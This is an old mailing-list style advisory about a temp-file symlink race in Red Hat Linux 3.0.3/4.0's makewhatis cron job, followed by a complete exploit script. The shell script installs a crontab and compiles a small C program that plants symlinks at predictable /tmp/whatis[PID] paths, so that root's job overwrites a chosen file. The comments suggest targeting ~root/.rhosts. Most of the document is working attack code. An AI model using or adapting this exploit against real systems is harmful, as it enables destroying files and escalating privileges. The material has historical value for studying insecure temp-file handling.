There is a serious problem with the makewhatis cronjob under Redhat Linux
4.0/3.0.3. You can use it to overwrite any file on the system. Redhat
is aware of the problem, and said they would have some kind of fix by
next week which should be plenty of time before this bug is exploitable
again.
#!/bin/sh
#
# blowitawaysam
#
# makewhatis is a shellscript that stores a tmp copy of the whatis
# database in /tmp/whatis[PID]. This is easily predictable, and even
# more easily brute forced.
#
# really silly script to blow away a file on redhat 3.0.3/4.0 system
# with makewhatis in /etc/crontab. Severely limited as you can only
# overwrite one file a week with the whatis database.
#
# If someone is really clever, maybe they can overwrite ~root/.rhosts
# and try IP spoofing in from ''cat'' as user
''(1)'' <smirk>
#
# Dave G.
# <daveg@escape.com>
# http://www.escape.com/~daveg
# 12/21/96
NUMLINKS=100 # I dont feel like guessing. This will hit it.
# Admittedly, it has as much style as a clumsy leper.
if [ -x /usr/bin/crontab ] ; then
cat << ! > evil_cron
# These are for 3.0.3
19 03 * * 1 $PWD/overwrite $1 $NUMLINKS
00 04 * * 1 /bin/rm -f /tmp/whatis* $PWD/overwrite
# These are for 4.0
00 02 * * 0 $PWD/overwrite $1 $NUMLINKS
00 03 * * 0 /bin/rm -f /tmp/whatis* $PWD/overwrite
!
/usr/bin/crontab evil_cron 2>&1 > /dev/null
if [ $? -ne 0 ] ; then
echo "You are in cron.deny. Gonna have to do it yourself."
exit 1
fi
cat << ! > overwrite.c
#include <stdio.h>
#include <unistd.h>
int main(int argc, char **argv)
{
int i,t, really;
pid_t sucks;
char alot[100];
t=atoi(argv[2]);
sucks=getpid();
for ( i=0 ; i<t ; i++ )
{
really = sucks + i;
sprintf(alot, "/tmp/whatis%d", really);
symlink(argv[1], alot);
}
}
!
cc -O6 -o overwrite overwrite.c
chmod 755 $PWD/overwrite
rm overwrite.c evil_cron
echo Everything is set up. Leave the program overwrite exactly where it is.
echo now you just have to wake till sunday for 4.0 or monday for 3.0.3.
else
echo no cron for you.
fi
Dave G.
<daveg@escape.com>
http://www.escape.com/~daveg
